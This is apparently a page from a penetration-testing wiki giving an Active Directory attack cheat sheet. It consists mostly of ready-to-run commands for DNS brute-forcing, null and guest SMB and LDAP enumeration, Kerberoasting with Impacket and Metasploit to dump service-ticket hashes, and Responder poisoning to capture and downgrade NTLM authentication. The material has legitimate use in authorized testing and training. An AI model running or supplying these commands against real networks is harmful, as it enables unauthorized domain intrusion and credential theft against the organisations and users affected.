Enumeration

Recon Activity:

Enumerating DNS could give information about key servers in the domain as web, printers, shares, vpn, media, etc.

gobuster dns -d domain.local -t 25 -w /opt/Seclist/Discovery/DNS/subdomain-top2000.txt

Check for null and Guest access on smb services (this won't work on modern Windows versions):

enum4linux -a -u "" -p "" <DC IP> && enum4linux -a -u "guest" -p "" <DC IP>

smbmap -u "" -p "" -P 445 -H <DC IP> && smbmap -u "guest" -p "" -P 445 -H <DC IP>

smbclient -U '%' -L //<DC IP> && smbclient -U 'guest%' -L //

rpcclient -U "" -N <IP> #No creds

smbclient --no-pass -L //<IP> # Null user

Enumerate LDAP

nmap -n -sV --script "ldap* and not brute" -p 389 <DC IP>

GitHub - ropnop/go-windapsearch: Utility to enumerate users, groups and computers from a Windows domain through LDAP queriesGitHub

# Get computers
python3 windapsearch.py --dc-ip 10.10.10.10 -u [email protected] -p password --computers
# Get groups
python3 windapsearch.py --dc-ip 10.10.10.10 -u [email protected] -p password --groups
# Get users
python3 windapsearch.py --dc-ip 10.10.10.10 -u [email protected] -p password --da
# Get Domain Admins
python3 windapsearch.py --dc-ip 10.10.10.10 -u [email protected] -p password --da
# Get Privileged Users
python3 windapsearch.py --dc-ip 10.10.10.10 -u [email protected] -p password --privileged-users

ldapsearch

Check null credentials or if your credentials are valid:

ldapsearch -x -H ldap://<IP> -D '' -w '' -b "DC=<1_SUBDOMAIN>,DC=<TLD>"
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "DC=<1_SUBDOMAIN>,DC=<TLD>"

Kerberoast

# Metasploit framework
msf> use auxiliary/gather/get_user_spns

# Impacket
GetUserSPNs.py -request -dc-ip <DC_IP> <DOMAIN.FULL>/<USERNAME> -outputfile hashes.kerberoast # Password will be prompted
GetUserSPNs.py -request -dc-ip <DC_IP> -hashes <LMHASH>:<NTHASH> <DOMAIN>/<USERNAME> -outputfile hashes.kerberoast

# kerberoast: https://github.com/skelsec/kerberoast
kerberoast ldap spn 'ldap+ntlm-password://<DOMAIN.FULL>\<USERNAME>:<PASSWORD>@<DC_IP>' -o kerberoastable # 1. Enumerate kerberoastable users
kerberoast spnroast 'kerberos+password://<DOMAIN.FULL>\<USERNAME>:<PASSWORD>@<DC_IP>' -t kerberoastable_spn_users.txt -o kerberoast.hashes # 2. Dump hashes

Poison the network

Running Responder

To run Responder with default settings: responder -I <Interface>
For more aggressive probing (with potential side effects): responder -I <Interface> -P -r -v
Techniques to capture NTLMv1 challenges/responses for easier cracking: responder -I <Interface> --lm --disable-ess
WPAD impersonation can be activated with: responder -I <Interface> --wpad
NetBIOS requests can be resolved to the attacker's IP, and an authentication proxy can be set up: responder.py -I <interface> -Pv

War RoomWar Room

PreviousActive Directory NextGetting Credentials

Last updated 1 year ago